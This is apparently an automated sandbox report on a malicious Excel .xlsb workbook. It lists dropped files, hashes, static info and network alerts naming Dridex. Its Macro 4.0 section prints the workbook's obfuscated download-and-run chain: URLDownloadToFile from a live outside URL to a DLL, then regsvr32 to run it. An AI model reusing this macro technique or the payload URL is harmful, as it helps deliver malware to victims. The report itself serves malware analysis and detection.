                                                                                                                                                      SHA-256:7F1E14B77DF7F3FCEB0C34441CA6F6A68288706308BF5B072FAE111AF6BE0817
                                                                                                                                                      SHA-512:41056D2FD4A84E050F7EDC8F962B02C093AD02F3B2B8E410F424A6E155672AF6BA67D21579EC5B0BF6A56F9E8B71B2B0035C5E6B822B78072D1EB2DCBCA3E94F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-09T13:21:51">.. Build: 16.0.14207.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2FDD9604.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9924
                                                                                                                                                      Entropy (8bit):7.973758306371751
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
                                                                                                                                                      MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
                                                                                                                                                      SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
                                                                                                                                                      SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
                                                                                                                                                      SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3DB5784F.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6177
                                                                                                                                                      Entropy (8bit):7.959095006853368
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
                                                                                                                                                      MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
                                                                                                                                                      SHA1:615484A338922DDF00B903CFA48060AD60D70207
                                                                                                                                                      SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
                                                                                                                                                      SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5E6A3635.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5744
                                                                                                                                                      Entropy (8bit):7.966496386988271
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
                                                                                                                                                      MD5:9AD30E24270C495AE68EAF3A1EEECBFB
                                                                                                                                                      SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
                                                                                                                                                      SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
                                                                                                                                                      SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\682ADEB2.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):956
                                                                                                                                                      Entropy (8bit):7.683552542542939
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
                                                                                                                                                      MD5:32C83607A5C98C5A634278E5AED3AD61
                                                                                                                                                      SHA1:EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
                                                                                                                                                      SHA-256:4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
                                                                                                                                                      SHA-512:AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]*....@.-.L..G.....Q."..%fb.Z*.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\86406406.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):23989
                                                                                                                                                      Entropy (8bit):7.989754044300238
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
                                                                                                                                                      MD5:839795652A8FE78F26F4D86D757ABDE8
                                                                                                                                                      SHA1:979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
                                                                                                                                                      SHA-256:1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
                                                                                                                                                      SHA-512:E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):205312
                                                                                                                                                      Entropy (8bit):6.709188825960524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
                                                                                                                                                      MD5:28193BA741232F91101849F606FA8419
                                                                                                                                                      SHA1:12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
                                                                                                                                                      SHA-256:67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
                                                                                                                                                      SHA-512:783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: sample.ocx, Detection: malicious, Browse
                                                                                                                                                      IE Cache URL:https://tpfcu.com/getfile.php
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B[..:...:...:..$Z...:..$Z...:..$Z..~:..=d...:..=d...:..=d...:..$Z...:...:..k:...:...:...d...:...dY..:...d...:..Rich.:..................PE..d....P.`.........." .........................................................p............`.............................................T...d...x........N......l............`.........8...........................0................................................text...0........................... ..`.rdata...".......$..................@..@.data...............................@....pdata..l...........................@..@.gfids..............................@..@.rsrc....N.......N..................@..@.reloc.......`......................@..B................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\18720000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80566
                                                                                                                                                      Entropy (8bit):7.893302821449264
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:Xelem3l7eO+dRRVnyY7lMVGoIahaDHTU6hryF70cAeWvijWGHc:bol7eO6RSY72sTU2yF70cAijW2c
                                                                                                                                                      MD5:5138B6C608292E4C867FC32717C1CF59
                                                                                                                                                      SHA1:836E1C79573D2D8F2E5FCED81BDCA22EEE921EF1
                                                                                                                                                      SHA-256:F04037BBF157BEAF7297874FD3700B1059E20B1E6FBF199C61F2B1E112E660C7
                                                                                                                                                      SHA-512:43AF1CC70CD407BBB7BD1B78B98F1054A85A44C96DDAEA6B1AA3AA2D5D0A943659D445D8566010CE5FB177C2597A57FEEA27D5440B8A8D285E2BD5891A31C67C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .UKO.0..#...|]%n9..)..rd.`..kO..~.c.....P.*-.\.r..|.O&.+k.....k......J..e....Va.N....l....?.&w..X..a....o.Q.`.6>.....V$....B.E..|4..w.\.S.`.._X.{....o......,.2m3>?.;.s..!D.FK..4...;[._,....%3...Ba...iB..1.BJ..~....q.C..!.1.u......y.m....p...Q+.nDL..RZ|e......f?I..b.+..).7V..gN..........D^N.OH..H.w#WR...(..#.?.i3..3..+r...}.\.....O.........~s/7...{.A.&...x.}....1[.....D.ti$.D...d.....1.]."..4l..-.U..rr.!Oq.j.6/...........PK..........!........v.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\L3YD7CE.dll
                                                                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):205312
                                                                                                                                                      Entropy (8bit):6.709188825960524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
                                                                                                                                                      MD5:28193BA741232F91101849F606FA8419
                                                                                                                                                      SHA1:12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
                                                                                                                                                      SHA-256:67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
                                                                                                                                                      SHA-512:783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: sample.ocx, Detection: malicious, Browse
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B[..:...:...:..$Z...:..$Z...:..$Z..~:..=d...:..=d...:..=d...:..$Z...:...:..k:...:...:...d...:...dY..:...d...:..Rich.:..................PE..d....P.`.........." .........................................................p............`.............................................T...d...x........N......l............`.........8...........................0................................................text...0........................... ..`.rdata...".......$..................@..@.data...............................@....pdata..l...........................@..@.gfids..............................@..@.rsrc....N.......N..................@..@.reloc.......`......................@..B................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\Desktop\~$Documents_13134976_1377491379.xlsb
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      C:\Users\user\iepfusn.dll
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):205312
                                                                                                                                                      Entropy (8bit):6.709188825960524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b
                                                                                                                                                      MD5:28193BA741232F91101849F606FA8419
                                                                                                                                                      SHA1:12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5
                                                                                                                                                      SHA-256:67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
                                                                                                                                                      SHA-512:783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: sample.ocx, Detection: malicious, Browse
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B[..:...:...:..$Z...:..$Z...:..$Z..~:..=d...:..=d...:..=d...:..$Z...:...:..k:...:...:...d...:...dY..:...d...:..Rich.:..................PE..d....P.`.........." .........................................................p............`.............................................T...d...x........N......l............`.........8...........................0................................................text...0........................... ..`.rdata...".......$..................@..@.data...............................@....pdata..l...........................@..@.gfids..............................@..@.rsrc....N.......N..................@..@.reloc.......`......................@..B................................................................................................................................................................................................

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.867132102918904
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                      • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                      File name:Documents_13134976_1377491379.xlsb
                                                                                                                                                      File size:64636
                                                                                                                                                      MD5:276bf3db434b887bb77adca0bd46e130
                                                                                                                                                      SHA1:eee2be9136f2c70a28b6ca5289e73e2a38453da2
                                                                                                                                                      SHA256:27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce
                                                                                                                                                      SHA512:abe0052635a1064304828a7b8fa8663997fb023d542944ddb3bdb346170bd5fbe9a76b2e53184e4b3c7a9e09a768982a396b7253d83c309fd7f522f427262e7a
                                                                                                                                                      SSDEEP:1536:LvnO2wWjlMVGoIahaDHTU6hryF70liWWGH0AeWl+R:LGCj2sTU2yF70liWW200+R
                                                                                                                                                      File Content Preview:PK..........!.+...............[Content_Types].xml ...(.....................................................................................................................................................................................!!..................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Documents_13134976_1377491379.xlsb"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29, before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25, before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42, before.2.18.46.sheet!BP33, before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22, before.2.18.46.sheet!BN24, before.2.18.46.sheet!BP38, before.2.18.46.sheet!BP41)

                                                                                                                                                      =EXEC(Sheet1!BF42&Sheet1!BF43&Sheet1!BF44&Sheet1!BN24)=HALT()
                                                                                                                                                      ,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,tpfcu.com/getfile.,,,,,,,,,,,,,,,,,,,,,,,,,,php,,,,,,,,,,,"=CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29,before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25,before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42,before.2.18.46.sheet!BP33,before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22,before.2.18.46.sheet!BN24,before.2.18.46.sheet!BP38,before.2.18.46.sheet!BP41)",,,,,,,,,,,,,,,,,,,,,,,,,,=Sheet2!BB10(),,,,,,,,,,,,,,,,,,,..\iepfusn.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      06/09/21-15:22:05.833841ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:05.833841ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:10.528872ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:10.528872ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:20.469415ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:20.469415ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:25.029456ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:25.029456ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:36.677659ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:36.677659ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:41.530548ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:41.530548ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:49.386614TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434974018.117.84.120192.168.2.6
                                                                                                                                                      06/09/21-15:23:25.363224TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434974718.117.84.120192.168.2.6
                                                                                                                                                      06/09/21-15:23:57.298792TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434975018.117.84.120192.168.2.6

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 9, 2021 15:21:55.282211065 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.420984030 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.421092987 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.422017097 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.558451891 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.561686039 CEST44349715107.180.50.232192.168.2.6
